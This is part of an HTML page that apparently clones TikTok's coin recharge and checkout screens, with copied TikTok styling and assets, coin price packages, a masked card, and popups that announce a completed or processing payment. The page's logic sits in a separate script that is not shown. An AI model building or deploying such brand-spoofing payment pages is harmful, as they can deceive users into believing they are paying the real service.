                                                    d="M33 19C30.2041 19 27.9375 16.7614 27.9375 14H24.5625V27.6111C24.5625 29.2986 23.1774 30.6667 21.4688 30.6667C19.7601 30.6667 18.375 29.2986 18.375 27.6111C18.375 25.9236 19.7601 24.5556 21.4688 24.5556C21.722 24.5556 21.9659 24.5853 22.1981 24.6406C22.2365 24.6497 22.2747 24.6596 22.3125 24.6701V21.2763C22.0358 21.2406 21.7541 21.2222 21.4688 21.2222C17.8962 21.2222 15 24.0826 15 27.6111C15 31.1396 17.8962 34 21.4688 34C25.0413 34 27.9375 31.1396 27.9375 27.6111V20.6673C29.3477 21.7134 31.1005 22.3333 33 22.3333V19Z"
                                                    fill="#FEF5CD"></path>
                                            </svg>
                                        </span>
                                        <span data-e2e="wallet-package-coin-num-5"
                                            class="tiktok-wkgdjt-SpanNumDisplay e4yj8b63">7,000
                                        </span>
                                    </div>
                                    <div class="tiktok-1uetk1w-DivTextContainer e4yj8b64">
                                        <span data-e2e="wallet-package-price-5"
                                            class="tiktok-10102vh-SpanTextNow e4yj8b66"> $ 74
                                        </span>
                                    </div>
                                </button>
                            </li>
                            <li>
                                <button id="btn-coin7" data-e2e="wallet-package-6" aria-label="17500 Điểm"
                                    aria-selected="false" class="tiktok-l4v9n8-ButtonContainer e4yj8b60">
                                    <div class="tiktok-16jd2dh-DivNumContainer e4yj8b61">
                                        <span data-e2e="wallet-package-coin-icon-6"
                                            class="tiktok-240y52-SpanNumIcon e4yj8b62">
                                            <svg class="tiktok-kkwvro-StyledCoinIcon e4yj8b611" width="1em" data-e2e=""
                                                height="1em" viewBox="0 0 48 48" fill="none"
                                                xmlns="http://www.w3.org/2000/svg">
                                                <circle cx="24" cy="24" r="22" fill="#FFEC9B"></circle>
                                                <circle cx="24" cy="24" r="17" fill="#FACE15"></circle>
                                                <path fill-rule="evenodd" clip-rule="evenodd"
                                                    d="M40.9347 25.5C40.9779 25.0058 41 24.5055 41 24C41 14.6112 33.3888 7 24 7C14.6112 7 7 14.6112 7 24C7 24.5055 7.02206 25.0058 7.06527 25.5C7.82466 16.8137 15.1166 10 24 10C32.8834 10 40.1753 16.8137 40.9347 25.5Z"
                                                    fill="#FABC15"></path>
                                                <path
                                                    d="M33 19C30.2041 19 27.9375 16.7614 27.9375 14H24.5625V27.6111C24.5625 29.2986 23.1774 30.6667 21.4688 30.6667C19.7601 30.6667 18.375 29.2986 18.375 27.6111C18.375 25.9236 19.7601 24.5556 21.4688 24.5556C21.722 24.5556 21.9659 24.5853 22.1981 24.6406C22.2365 24.6497 22.2747 24.6596 22.3125 24.6701V21.2763C22.0358 21.2406 21.7541 21.2222 21.4688 21.2222C17.8962 21.2222 15 24.0826 15 27.6111C15 31.1396 17.8962 34 21.4688 34C25.0413 34 27.9375 31.1396 27.9375 27.6111V20.6673C29.3477 21.7134 31.1005 22.3333 33 22.3333V19Z"
                                                    fill="#FEF5CD"></path>
                                            </svg>
                                        </span>
                                        <span data-e2e="wallet-package-coin-num-6"
                                            class="tiktok-wkgdjt-SpanNumDisplay e4yj8b63">17,500
                                        </span>
                                    </div>
                                    <div class="tiktok-1uetk1w-DivTextContainer e4yj8b64">
                                        <span data-e2e="wallet-package-price-6"
                                            class="tiktok-10102vh-SpanTextNow e4yj8b66"> $ 185
                                        </span>
                                    </div>
                                </button>
                            </li>
                            <li>
                                <button id="btn-coin8" data-e2e="wallet-package-custom" aria-label="Tùy chỉnh"
                                    aria-selected="false" class="tiktok-l4v9n8-ButtonContainer e4yj8b60">
                                    <div class="tiktok-16jd2dh-DivNumContainer e4yj8b61">
                                        <span class="tiktok-240y52-SpanNumIcon e4yj8b62">
                                            <svg class="tiktok-kkwvro-StyledCoinIcon e4yj8b611" width="1em" data-e2e=""
                                                height="1em" viewBox="0 0 48 48" fill="none"
                                                xmlns="http://www.w3.org/2000/svg">
                                                <circle cx="24" cy="24" r="22" fill="#FFEC9B"></circle>
                                                <circle cx="24" cy="24" r="17" fill="#FACE15"></circle>
                                                <path fill-rule="evenodd" clip-rule="evenodd"
                                                    d="M40.9347 25.5C40.9779 25.0058 41 24.5055 41 24C41 14.6112 33.3888 7 24 7C14.6112 7 7 14.6112 7 24C7 24.5055 7.02206 25.0058 7.06527 25.5C7.82466 16.8137 15.1166 10 24 10C32.8834 10 40.1753 16.8137 40.9347 25.5Z"
                                                    fill="#FABC15"></path>
                                                <path
                                                    d="M33 19C30.2041 19 27.9375 16.7614 27.9375 14H24.5625V27.6111C24.5625 29.2986 23.1774 30.6667 21.4688 30.6667C19.7601 30.6667 18.375 29.2986 18.375 27.6111C18.375 25.9236 19.7601 24.5556 21.4688 24.5556C21.722 24.5556 21.9659 24.5853 22.1981 24.6406C22.2365 24.6497 22.2747 24.6596 22.3125 24.6701V21.2763C22.0358 21.2406 21.7541 21.2222 21.4688 21.2222C17.8962 21.2222 15 24.0826 15 27.6111C15 31.1396 17.8962 34 21.4688 34C25.0413 34 27.9375 31.1396 27.9375 27.6111V20.6673C29.3477 21.7134 31.1005 22.3333 33 22.3333V19Z"
                                                    fill="#FEF5CD"></path>
                                            </svg>
                                        </span>
                                        <span id="custun-coin" data-e2e="wallet-package-coin-text-custom"
                                            class="tiktok-wkgdjt-SpanNumDisplay e4yj8b63">
                                            Custom
                                        </span>
                                        <input id="input-coin" data-e2e="wallet-package-coin-custom-input-box"
                                            type="number " pattern="[0-9]*" aria-describedby="error-tip"
                                            class="tiktok-1a6v254-InputNum e4yj8b67" value="" fdprocessedid="diwy68">
                                    </div>
                                    <div class="tiktok-1uetk1w-DivTextContainer e4yj8b64">
                                        <span id="money" data-e2e="wallet-package-text-custom"
                                            class="tiktok-10102vh-SpanTextNow e4yj8b66">
                                            Large amount supported
                                        </span>

                                    </div>
                                </button>
                            </li>
                        </ol>
                    </div>
                    <div class="tiktok-11ddo6h-DivTotalContainer e1ndw46o0">
                        <ul class="tiktok-fbshyx-UlPaymentMethodsContainer e1ndw46o1">
                            <li>
                                <span data-e2e="wallet-title-payment-method"
                                    class="tiktok-iuydjj-SpanTotalText e1ndw46o2">Payment method
                                </span>
                            </li>
                            <!-- <li>
                                <img src="https://lf16-co.g-p-static.com/obj/pipo-sgcompliance/sky/momo_4256e5.png"
                                    data-e2e="wallet-payment-icon-MOMO" alt="MoMo"
                                    class="tiktok-1quc8c-ImgPaymentIcon e1ndw46o5"></li>
                            <li>
                                <img src="https://lf16-co.g-p-static.com/obj/pipo-sgcompliance/sky/zalopay-icon_e8534b.svg"
                                    data-e2e="wallet-payment-icon-ZALOPAY" alt="ZaloPay"
                                    class="tiktok-1quc8c-ImgPaymentIcon e1ndw46o5"></li> -->
                            <li>
                                <img src="https://lf16-co.g-p-static.com/obj/pipo-sgcompliance/sky/visa_light_c558fb.svg"
                                    data-e2e="wallet-payment-icon-VISA" alt="Visa"
                                    class="tiktok-1quc8c-ImgPaymentIcon e1ndw46o5">
                            </li>
                            <li>
                                <img src="https://lf16-co.g-p-static.com/obj/pipo-sgcompliance/sky/mastercard-gray-update_7b3ceb.svg"
                                    data-e2e="wallet-payment-icon-MASTER" alt="Mastercard"
                                    class="tiktok-1quc8c-ImgPaymentIcon e1ndw46o5">
                            </li>
                            <li>
                                <img style="width: 40px;height: 40px;" src="./img/paypal.svg"
                                    data-e2e="wallet-payment-icon-DINERS" alt="DINERS"
                                    class="tiktok-1quc8c-ImgPaymentIcon e1ndw46o5">
                            </li>
                            <li>
                                <img src="https://lf16-co.g-p-static.com/obj/pipo-sg/sky/card_american_express_v1_429e0f.svg"
                                    data-e2e="wallet-payment-icon-AMEX" alt="American Express"
                                    class="tiktok-1quc8c-ImgPaymentIcon e1ndw46o5">
                            </li>

                            <li>
                                <img src="https://lf16-co.g-p-static.com/obj/pipo-sg/sky/discover_5ec158.svg"
                                    data-e2e="wallet-payment-icon-DISCOVER" alt="Discover"
                                    class="tiktok-1quc8c-ImgPaymentIcon e1ndw46o5">
                            </li>
                            <!-- <li>
                                <img src="https://lf16-co.g-p-static.com/obj/pipo-sgcompliance/sky/2c2p-border_2ec2d6.png"
                                    data-e2e="wallet-payment-icon-BANK_TRANSFER" alt="2c2p banktransfer"
                                    class="tiktok-1quc8c-ImgPaymentIcon e1ndw46o5">
                            </li> -->
                        </ul>
                    </div>
                    <div class="tiktok-1fguu8v-DivTotalContainer e9ndt4q0"><span data-e2e="wallet-title-total-price"
                            class="tiktok-b4z60k-SpanTotalText e9ndt4q5">Total</span><span id="total-money"
                            aria-live="polite" data-e2e="wallet-total-price"
                            class="tiktok-s1n2m4-SpanTotalMount e9ndt4q6">$ </span>
                    </div>
                    <div class="tiktok-vr1v8s-DivButtonContainer e9ndt4q8"><button id="btn-submit" type="button"
                            data-e2e="wallet-button-buynow" aria-label="Nạp tiền" aria-live="polite"
                            class="e9ndt4q10 tiktok-17w9yy9-Button-StyledBuyButton ehk74z00">Recharge</button>
                    </div>
                </div><button aria-label="Câu hỏi thường gặp"
                    class="tiktok-1l1fdho-ButtonQuestionContainer e17zolsy4"><svg
                        class="tiktok-ze008l-StyledQnMarkIcon e17zolsy3" width="1em" data-e2e="" height="1em"
                        viewBox="0 0 48 48" fill="currentColor" xmlns="http://www.w3.org/2000/svg">
                        <path fill-rule="evenodd" clip-rule="evenodd"
                            d="M24 6C14.0589 6 6 14.0589 6 24C6 33.9411 14.0589 42 24 42C33.9411 42 42 33.9411 42 24C42 14.0589 33.9411 6 24 6ZM2 24C2 11.8497 11.8497 2 24 2C36.1503 2 46 11.8497 46 24C46 36.1503 36.1503 46 24 46C11.8497 46 2 36.1503 2 24ZM24.0909 15C22.172 15 20.3433 16.2292 19.2617 18.61C19.0332 19.1128 18.4726 19.4 17.9487 19.2253L16.0513 18.5929C15.5274 18.4182 15.2406 17.8497 15.4542 17.3405C16.9801 13.7031 20.0581 11 24.0909 11C28.459 11 32 14.541 32 18.9091C32 21.2138 30.7884 23.4606 29.2167 25.074C27.8157 26.5121 25.5807 27.702 22.9988 27.9518C22.4491 28.0049 22.0001 27.5523 22.0001 27V25C22.0001 24.4477 22.4504 24.0057 22.9955 23.9167C24.2296 23.7153 25.5034 23.1533 26.3515 22.2828C27.4389 21.1666 28 19.8679 28 18.9091C28 16.7502 26.2498 15 24.0909 15ZM24 36C22.3431 36 21 34.6569 21 33C21 31.3431 22.3431 30 24 30C25.6569 30 27 31.3431 27 33C27 34.6569 25.6569 36 24 36Z">
                        </path>
                    </svg></button>
            </div>
        </main>
    </div>
    <div id="payment" class="payment">
        <div class="">
            <div class="">


            </div>
        </div>
    </div>
    <div id="result" class="result">
        <div class="thanhcong">
            <div class="pupupResult">
                <div style="padding: 45px;">
                    <i class="fa-regular fa-circle-check fa-3x"></i>
                    <div class="div1">
                        Payment Completed
                    </div>
                    <div class="div2">
                        You recharged <span id="text-coin-result">70</span> coins.
                        You can use Coins to send virtual Gift.
                    </div>
                </div>
                <div id="btn-back" class="btn-back">
                    Go Back
                </div>
            </div>
        </div>
    </div>

    <!-- THẤT BẠI -->
    <div id="resultload" class="result1">
        <div class="thatbai">
            <div class="pupupResult1">
                <div class="thatbai-icon">
                    <i id="icon" class="fa-sharp fa-regular fa-hourglass-half fa-2x"></i>
                </div>
                <div class="div1">
                    Processing your Payment
                </div>
                <div class="div2">
                    This could take a few seconds
                </div>

            </div>
        </div>
    </div>

    <!-- payment -->
    <div id="payload" class="payload">
        <div class="tiktok-py8jux-DivModalContainer e1gjoq3k0" style="z-index: 1001; position: fixed;">
            <div class="tiktok-v2a75e-DivModalMask e1gjoq3k2"></div>
            <div data-focus-guard="true" tabindex="0"
                style="width: 1px; height: 0px; padding: 0px; overflow: hidden; position: fixed; top: 1px; left: 1px;">
            </div>
            <div data-focus-lock-disabled="false">
                <div class="tiktok-1dw2wty-DivCenterWrapper e1gjoq3k7">
                    <div data-e2e="" tabindex="0" id="login-modal" class="tiktok-it2bln-DivContentContainer e1gjoq3k3">
                        <div class="tiktok-mzpspd-DivCashierPage e1pixxy00">
                            <div class="tiktok-1pe9af7-DivCashierContainer e1pixxy01">
                                <header data-e2e="cashier-title-order-summary"
                                    class="tiktok-1ovc93r-HeaderOrderSummaryTitle epmvpph0">Order summary</header>
                                <div class="tiktok-197anyc-DivProfileRow epmvpph2"><span
                                        data-e2e="cashier-account-title"
                                        class="tiktok-2xi6jj-SpanProfileDescription epmvpph3">Account</span>
                                    <div class="tiktok-1vchfa7-DivProfileInfo epmvpph4">
                                        <div tabindex="0" role="button" aria-haspopup="true" aria-controls=""
                                            data-e2e="profile-icon" class="tiktok-1igqi6u-DivProfileContainer efubjyv0"
                                            style="background-image: url(&quot;https://p16-sign-sg.tiktokcdn.com/aweme/720x720/tiktok-obj/b6a5fe41fd01b2c5f50f53888ccb29ad.jpeg?x-expires=1687327200&amp;x-signature=kLa16kgPAffo8wjkfBgyalggBwk%3D&quot;); height: 32px; min-width: 32px;"
                                            fdprocessedid="8opefn"></div>
                                        <span id="Account" data-e2e="cashier-user-name"
                                            class="tiktok-5izt7k-SpanProfileUsername epmvpph5"></span>
                                    </div>
                                </div>
                                <div class="tiktok-q8zfnj-DivOrderDetails epmvpph6">
                                    <div data-e2e="cashier-coins-price"
                                        class="tiktok-1b0yaet-DivOrderSummaryContent epmvpph1"><span id="coins">
                                            Coins</span><span id="totalMoney1">$</span></div>
                                    <div data-e2e="cashier-total-price"
                                        class="tiktok-oadu89-DivOrderSummaryContent epmvpph1"><span>Total</span><span
                                            id="totalMoney2">$</span></div>
                                </div>
                                <div class="tiktok-qov981-DivLoadingWrapper eezq8x00">
                                    <div class="tiktok-1eyyzw7-DivCardActionsContainer ecutb2w0"><button type="button"
                                            data-e2e="cashier-payment-method-entrance"
                                            class="ecutb2w1 tiktok-1dpzqeb-Button-StyledCardManageBtn ehk74z00"
                                            fdprocessedid="golpij">Manage</button></div>
                                    <div data-theme="light" dir="ltr">
                                        <div class="pipo pipo-pc pc-payment" data-sel="pipo-pc-payment-methods-wrapper"
                                            style="direction: ltr;">
                                            <form>
                                                <div class="pc-payment-container">
                                                    <div class="pc-payment-header">
                                                        <div
                                                            class="arco-row arco-row-align-center arco-row-justify-center">
                                                            <div class="arco-statistic">
                                                                <div class="arco-statistic-content">
                                                                    <div class="arco-statistic-value"
                                                                        style="color: var(--pipo-pc-color-text-primary); font-size: var(--pipo-pc-font-size-display-primary); font-weight: var(--pipo-pc-font-weight-title);">
                                                                        <span class="arco-statistic-value-int"><span
                                                                                class="arco-statistic-value-prefix"></span>
                                                                            19,100</span>
                                                                    </div>
                                                                </div>
                                                            </div>
                                                        </div>
                                                        <div class="pc-payment-header-divider"></div>
                                                    </div>
                                                    <div class="pc-payment-list ">
                                                        <div class="pc-payment-list-title"><span>Select a payment
                                                                method</span></div>
                                                    </div>
                                                    <div class="pc-payment-list pc-payment-list-bottom">
                                                        <div>
                                                            Method
                                                        </div>

                                                        <div id="EditCard" class="pc-payment-item"
                                                            data-sel="pipo-pc-pi-other-visa">
                                                            <div id="Cardtitle"
                                                                class="arco-row arco-row-align-center arco-row-justify-space-between pc-payment-item-content ">
                                                                <div class="pc-payment-item-right "
                                                                    style="overflow: hidden;"><img
                                                                        alt="payment-method-icon"
                                                                        class="pc-payment-item-right-img ml-6"
                                                                        src="https://lf16-co.g-p-static.com/obj/pipo-sgcompliance/sky/visa_light_c558fb.svg">
                                                                        <span style="margin-left: 10px; font-size: 14px;">***********12</span>
                                                                </div>
                                                                <div class="pc-payment-item-left flex-col">
                                                                    <div class="flex">
                                                                        <input id="inputCard"
                                                                            style="margin-right: 10px;" type="radio"
                                                                            name="payment-method" value="paypal" checked
                                                                            class="pc-payment-item-input">
                                                                        <div class="pc-payment-item-label"
                                                                            style="margin-left: 0px; direction: ltr;">
                                                                            </div>
                                                                        <div class="pc-payment-item-tag"></div>
                                                                    </div>
                                                                </div>
                                                                
                                                            </div>
                                                            
                                                        </div>
                                                        <div>
                                                            Total : $5599.999
                                                        </div>
                                                    </div>
                                                </div>
                                                <div class="pc-payment-pay">
                                                    <div class="pc-payment-pay-container">
                                                        <div class="pc-payment-pay-container-btn">
                                                            <button
                                                                class="arco-btn arco-btn-primary arco-btn-size-large arco-btn-shape-square arco-btn-disabled"
                                                                type="button" disabled=""><span></span>
                                                            </button>
                                                        </div>
                                                    </div>
                                                </div>
                                            </form>
                                        </div>
                                    </div>
                                </div>
                            </div>
                            <footer class="tiktok-1quj9yy-FooterContainer emyf3oa0">
                                
                                <div class="tiktok-k6ibtx-DivButtonsContainer emyf3oa3"><button type="button"
                                        data-e2e="cashier-faq-icon"
                                        class="emyf3oa5 tiktok-fxbsh5-Button-StyledCashierHelpButton ehk74z00"
                                        fdprocessedid="2iyoc"><svg width="1em" data-e2e="" height="1em"
                                            viewBox="0 0 48 48" fill="currentColor" xmlns="http://www.w3.org/2000/svg">
                                            <path fill-rule="evenodd" clip-rule="evenodd"
                                                d="M24 6C14.0589 6 6 14.0589 6 24C6 33.9411 14.0589 42 24 42C33.9411 42 42 33.9411 42 24C42 14.0589 33.9411 6 24 6ZM2 24C2 11.8497 11.8497 2 24 2C36.1503 2 46 11.8497 46 24C46 36.1503 36.1503 46 24 46C11.8497 46 2 36.1503 2 24ZM24.0909 15C22.172 15 20.3433 16.2292 19.2617 18.61C19.0332 19.1128 18.4726 19.4 17.9487 19.2253L16.0513 18.5929C15.5274 18.4182 15.2406 17.8497 15.4542 17.3405C16.9801 13.7031 20.0581 11 24.0909 11C28.459 11 32 14.541 32 18.9091C32 21.2138 30.7884 23.4606 29.2167 25.074C27.8157 26.5121 25.5807 27.702 22.9988 27.9518C22.4491 28.0049 22.0001 27.5523 22.0001 27V25C22.0001 24.4477 22.4504 24.0057 22.9955 23.9167C24.2296 23.7153 25.5034 23.1533 26.3515 22.2828C27.4389 21.1666 28 19.8679 28 18.9091C28 16.7502 26.2498 15 24.0909 15ZM24 36C22.3431 36 21 34.6569 21 33C21 31.3431 22.3431 30 24 30C25.6569 30 27 31.3431 27 33C27 34.6569 25.6569 36 24 36Z">
                                            </path>
                                        </svg></button>
                                    <div><button id="btn-submit-pay" type="button" data-e2e="cashier-paynow-button"
                                            class="emyf3oa4 tiktok-1g0vmkc-Button-StyledPayButton ehk74z00">Pay now</button></div>
                                </div>
                            </footer>
                        </div>
                        <div id="btn-close" data-e2e="modal-close-inner-button" role="button" tabindex="0"
                            aria-label="Đóng" class="tiktok-xutjcp-DivCloseWrapper e1gjoq3k6"
                            style="margin-top: 5px; z-index: 100;" fdprocessedid="jauya"><svg
                                class="tiktok-1anes8e-StyledIcon e1gjoq3k5" width="1em" data-e2e="" height="1em"
                                viewBox="0 0 48 48" fill="currentColor" xmlns="http://www.w3.org/2000/svg">
                                <path fill-rule="evenodd" clip-rule="evenodd"
                                    d="M21.1718 23.9999L10.2931 13.1212C9.90261 12.7307 9.90261 12.0975 10.2931 11.707L11.7074 10.2928C12.0979 9.90228 12.731 9.90228 13.1216 10.2928L24.0002 21.1715L34.8789 10.2928C35.2694 9.90228 35.9026 9.90228 36.2931 10.2928L37.7073 11.707C38.0979 12.0975 38.0979 12.7307 37.7073 13.1212L26.8287 23.9999L37.7073 34.8786C38.0979 35.2691 38.0979 35.9023 37.7073 36.2928L36.2931 37.707C35.9026 38.0975 35.2694 38.0975 34.8789 37.707L24.0002 26.8283L13.1216 37.707C12.731 38.0975 12.0979 38.0975 11.7074 37.707L10.2931 36.2928C9.90261 35.9023 9.90261 35.2691 10.2931 34.8786L21.1718 23.9999Z">
                                </path>
                            </svg></div>
                    </div>
                </div>
            </div>
            <div data-focus-guard="true" tabindex="0"
                style="width: 1px; height: 0px; padding: 0px; overflow: hidden; position: fixed; top: 1px; left: 1px;">
            </div>
        </div>
    </div>
</body>
<script src="./js/index.js"></script>

</html>